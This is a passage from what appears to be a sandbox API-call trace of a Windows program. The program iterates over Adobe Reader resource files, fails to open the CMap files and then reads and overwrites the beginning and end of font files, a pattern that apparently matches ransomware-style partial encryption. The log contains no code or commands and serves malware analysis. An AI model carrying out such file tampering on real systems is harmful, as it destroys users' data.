(x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-90ms-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-90ms-rksj")) returned 0x20 [0096.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.321] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2", lpFilePart=0x2e9f690*="Adobe-Korea1-2") returned 0x45 [0096.321] GetLastError () returned 0x5 [0096.321] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.321] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.321] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.321] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.321] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.321] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.321] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-2")) returned 0x20 [0096.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2", lpFilePart=0x2e9f690*="B5pc-UCS2") returned 0x40 [0096.322] GetLastError () returned 0x5 [0096.322] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.322] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.322] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.322] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.322] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.322] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.323] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\B5pc-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\b5pc-ucs2")) returned 0x20 [0096.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.323] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H", lpFilePart=0x2e9f690*="ETenms-B5-H") returned 0x42 [0096.323] GetLastError () returned 0x5 [0096.323] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.323] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.323] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.323] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.323] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.324] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.324] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETenms-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\etenms-b5-h")) returned 0x20 [0096.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.324] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H", lpFilePart=0x2e9f690*="GB-EUC-H") returned 0x3f [0096.324] GetLastError () returned 0x5 [0096.324] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.324] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.324] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.324] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.325] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.325] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.325] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GB-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gb-euc-h")) returned 0x20 [0096.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.325] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V", lpFilePart=0x2e9f690*="GBKp-EUC-V") returned 0x41 [0096.325] GetLastError () returned 0x5 [0096.325] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.325] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.325] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.325] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.326] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.326] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.326] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBKp-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbkp-euc-v")) returned 0x20 [0096.326] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H", lpFilePart=0x2e9f690*="HKdla-B5-H") returned 0x41 [0096.326] GetLastError () returned 0x5 [0096.326] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.326] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.326] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.327] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.327] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.327] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.327] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-h")) returned 0x20 [0096.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.327] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H", lpFilePart=0x2e9f690*="HKm471-B5-H") returned 0x42 [0096.327] GetLastError () returned 0x5 [0096.328] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.328] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.328] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.328] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.328] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.328] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.328] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm471-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm471-b5-h")) returned 0x20 [0096.328] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.329] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H", lpFilePart=0x2e9f690*="KSCms-UHC-H") returned 0x42 [0096.329] GetLastError () returned 0x5 [0096.329] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.329] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.329] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.329] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.329] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.329] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.329] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-h")) returned 0x20 [0096.330] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90ms-rksj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ", lpFilePart=0x2e9f690*="UCS2-90ms-RKSJ") returned 0x45 [0096.368] GetLastError () returned 0x5 [0096.368] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.368] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.368] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.369] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.369] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.369] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.369] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-90ms-RKSJ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-90ms-rksj")) returned 0x20 [0096.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.369] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H", lpFilePart=0x2e9f690*="UniCNS-UCS2-H") returned 0x44 [0096.370] GetLastError () returned 0x5 [0096.370] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.370] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.370] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.370] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.370] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.370] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.370] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-ucs2-h")) returned 0x20 [0096.370] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H", lpFilePart=0x2e9f690*="UniJIS-UCS2-H") returned 0x44 [0096.371] GetLastError () returned 0x5 [0096.371] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.371] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.371] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.371] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.371] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.371] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.371] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-h")) returned 0x20 [0096.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H", lpFilePart=0x2e9f690*="UniKS-UCS2-H") returned 0x43 [0096.372] GetLastError () returned 0x5 [0096.372] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0096.372] LocalFree (hMem=0x69e2b0) returned 0x0 [0096.372] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0096.372] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0096.372] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.372] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0096.372] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UCS2-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-ucs2-h")) returned 0x20 [0096.372] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.373] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.373] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x37c34 [0096.373] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.373] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.373] ReleaseMutex (hMutex=0x168) returned 1 [0096.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-Regular.otf", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeArabic-Regular.otf", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeArabic-Regular.otf", lpUsedDefaultChar=0x0) returned 23 [0096.374] ReadFile (in: hFile=0x1cc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0096.381] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x36c34 [0096.381] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0096.386] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x36c34 [0096.387] WriteFile (in: hFile=0x1cc, lpBuffer=0x2696718*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696718*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.388] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0096.388] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0096.388] CloseHandle (hObject=0x1cc) returned 1 [0096.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Italic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-italic.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0096.389] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0096.389] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, 